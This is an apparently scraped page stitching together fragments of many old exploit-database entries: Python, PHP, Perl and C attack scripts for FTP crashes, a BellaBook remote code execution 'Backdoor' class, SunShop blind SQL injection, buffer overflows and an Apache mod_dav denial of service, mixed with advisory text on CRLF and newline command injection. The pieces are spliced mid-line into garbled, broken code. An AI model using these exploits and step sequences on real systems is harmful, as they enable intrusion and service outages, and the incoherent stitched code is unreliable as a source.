Next Page >>
r\n
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
if ($argc<5) {
print "-------------------------------------------------------------------------\r\n";
print " BellaBook Admin Bypass/Remote Code Execution\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: pheap.php [OPTION] [HOST] [PATH] [USER] ([COMMAND])\r\n\r\n";
print "[OPTION] = 0 = Credentials Disclosures\r\n";
print " 1 = Remote Code Execution\r\n";
//gratz : magrinho_loko, ne0h, mental_way, dr4k0 e aos que esqueci
ini_set("max_execution_time", 90000000);
set_time_limit(0);
define("NEW_LINE", "\n\r");
define("CMD_DIR", 'c:\\windows\\system32\\cmd.exe');
Class Backdoor
{
var $exec;
$result = update_bhdb("users", array("password"=>md5($password)),
array("username"=>$username));
# The _bhdb functions return false for success.
return true;
-}
\ No newline at end of file
+}
diff -u -r bytehoard-2.1-epsilon/includes/auth/ldap.inc.php
bytehoard-2.1-zeta/includes/auth/ldap.inc.php
--- bytehoard-2.1-epsilon/includes/auth/ldap.inc.php 2006-02-22
16:11:14.000000000 -0300
----------------------------------------
Cisco Bug Id - CSCTA04885
Affects - Cisco CSS & ACE
A second weakness that manifests itself on the CSS and ACE through
different interpretation of HTTP newline sequences between the content
switch and commonly used web servers. RFC 2616 [3] defines the US ASCII
carriage return/line feed (CRLF) sequence as the end-of-line marker for
protocol elements (excluding the entity-body). Indeed, the CSS and ACE
appear to adhere relatively closely to this requirement.
If you could log on the server successfully, take the following steps and the ftp server will crash which would lead to
Denial of Service attack:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.send("DELE "+ test_string +"\r\n")
7.sock.close()
Details:
If you could log on the server successfully, take the following steps and the ftp server will stop responding:
first socket connection:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.close()
#!/usr/bin/perl -w
use LWP::UserAgent;
# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Discovered
# By : irvian
# site : http://irvian.cn
# email : irvian.info@gmail.com
print "\r\n[+]-----------------------------------------[+]\r\n";
s1.connect((sys.argv[1] , 21));
s2.connect((sys.argv[1] , 21));
s3.connect((sys.argv[1] , 21));
s4.connect((sys.argv[1] , 21));
print ("[*] Sending evil stuff...");
s1.send("USER " + buff1 + "\r\n");
s2.send("USER " + buff2 + "\r\n");
s3.send("USER " + buff3 + "\r\n");
s4.send("USER " + buff1 + "\r\n");
print ("[*] Success! The server should now be inaccessible");
s1.close();
If you could log on the server successfully, take the following steps and the application
will stop service:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.for i in range(1,20):
sock.send("SITE INDEX "+ "a"*30*i +"\r\n")
5.sock.close()
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if(!(host=gethostbyname(server))) return -1;
'application/mspowerpoint' => 'ppt', 'application/powerpoint' =>
'ppt', 'application/vnd.ms-powerpoint' => 'ppt',
'application/x-mspowerpoint' => 'ppt', 'application/x-excel' =>
'xsl', 'application/pdf' => 'pdf');
if (!array_key_exists($filetype, $known_photo_types)) {
echo "<p class=\"error-alert\">".$LANG['err_not_doc1']." $filetype
".$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
return false;
} else {
copy($filetmpname, "gallery/documents/$filename");
return true;
36| $ip = getenv( "REMOTE_ADDR" );
37| }
38| else {
39| $ip = "UNKNOWN";
40| }
41| return( $ip );
42| }
So, an attacker can spoof his IP, he just have to create
an HTTP packet, add a special header, and send it. The
HTTP packet will look's like this:
manipulate account databases on the target resources. In the case of
*NIX-based systems the management server remotely logs in to a target
server and issues a series of shell command, using send-expect technique.
The system allows users to submit passwords containing control
characters including new line (ASCII 0x0A). The implementation of
send-expect mechanism fails to handle such passwords correctly. This
flaw allows an unprivileged Sun IDM user to execute an arbitrary UNIX
shell command by requesting a password to be changed to a specially
crafted value. The injected command will be executed with root
privileges on all UNIX systems the user is provisioned on.
Details
=======
Many scripts for various IRC clients, that report the name of the currently
playing song in a media player on IRC share the same security bug. They don't
sanitize the name of the song before sending it to the IRC server. When a
user plays a song with a newline (LF or CR, which are both message separators
in IRC) in the name of a song, and uses such a script, the text following the
newline will be interpreted by the IRC server as another command.
Exploitation requires the attacker to trick a user into playing such a
specially crafted song, and to then use his script while the song is playing.
That makes it hard, but not impossible to exploit in practice. It results in
TransferSock = 0
def sendDirList (sock):
(DataSock, Address) = TransferSock.accept()
print "sendDirList: TransferSock accepted a connection"
sock.send("150 Opening ASCII mode data connection for file list\r\n");
DataSock.send("-rwxr-xr-x 2 ftp ftp 4096 Aug 1
02:28 st\\..\\..\\..\\..\\..\\..\\BackSlashPoC\n");
DataSock.close()
sock.send("226 Transfer complete.\r\n");
print "sendDirList: Transfer complete\r\n"
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
are not properly sanitized when checking the destination filename. The
problem resides in the Notes feature implemented by tb2ftp.dll loaded by
the tb2pro.exe. This is the main issue.
2) Log input manipulation (CVE-2008-1118): Several fields of the packet
containing peer information (computer name, user name and IP address)
are taken from the packet sent to the target and used to display this
information on the screen of the target.
The vulnerabilities discovered allow a remote attacker to upload a file
to an arbitrary location on the victim's machine and forge peer
its features can be found at http://www.monkey-project.com/about.
Monkey (up to and including version 0.9.2) employs an insufficient
input validation method for handling HTTP requests with invalid
connection headers. Specifically, the vulnerability is in the
calculation for the end of the request body buffer related to newline
characters in function Request_Find_Variable() in the file
src/request.c.
With a specially crafted request body the pos_init_var integer can take
the value 0x1c (28 in decimal) and the pos_end_var integer can take the
payload into the remote process despite the buffer's small size (268
bytes). This was done by overwriting the ret value with part of the
Meterpreter payload.
- - Explanation of Process:
http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
- - Vulnerable Program:
http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip
- - Exploit Download:
https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAIL
ED!\n";
print $socket "USER AA AA AA :AA\r\n";
print $socket "NICK ". "\\" x 200 ."\r\n";
sleep(3);
close($socket);
<?php
$apaddr = "192.168.2.1";
$apport="1723";
$con = fsockopen($apaddr, $apport, $errno, $errstr);
if (!$con) {
echo "$errstr ($errno)<br />\n";
} else {
$trash = str_repeat("\x90","261");
fwrite($con, $trash);
sub usage {
print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "usage: perl apache-ied.pl <remotehost> <webdav folder>
[username] [password]\n";
print "example: perl apache-ied.pl svn.XXX.com /projects/\n";exit;
}
if ($#ARGV < 1) {usage();}
[+] Code
- [A] Blind SQL Injection
POST /path/modules/comment/post.php HTTP/1.1\r\n
Host: site\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 177\r\n
===============
1) Introduction
===============
Sick of junk email? Bored of all email programs looking the same? Take a look at Eureka Email and see how different things could be...
Eureka Email has a built in junk email filter which can remove about 95% of your spam and it continually learns as it comes across new junk emails. You can customise the program so each of your friends has their own icon and sound for when they send you an email. You can also set up special accounts for your children so that they never get to see sexually explicit or offensive junk emails.
(from Eureka Mail website)
#####################################################################################
============================
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
use IO::Socket;
my $server_ip=$ARGV[0];
my $server_port=$ARGV[1];
my $username=$ARGV[2];
my $password=$ARGV[3];
my $command=$ARGV[4];
my $buffer=$command ." " ."\x41" x 10000 ."\r\n";
if(($#ARGV + 1)!=5)
SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1-->
---------------------------------------------------------
CMS INFORMATION:
-->WEB: http://www.alumniserver.net/
-->DOWNLOAD: http://www.alumniserver.net/
-->DEMO: N/A
-->CATEGORY: CMS/Education
-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
and companies. Services for usersinclude profile page,...
Let's look at the code:
Filename "includes\functions.inc.php", line 36:
## Get Client IP Address
function get_ip_address() {
## New line added for cluser/cloud type hosting e.g. Mosso
if(isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP']) && !detectSSL()) return
$_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
## Otherwise use standard IP checks
$address = false;
if (isset($_SERVER['REMOTE_ADDR'])) {
Not needed.
One only has to call
"/screens/frameset.html"
and provide Basic Authentication data which uses
a username and password longer than 63 characters each.
The following header worked for me:
Authorization: Basic
MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0
Next Page>>
|
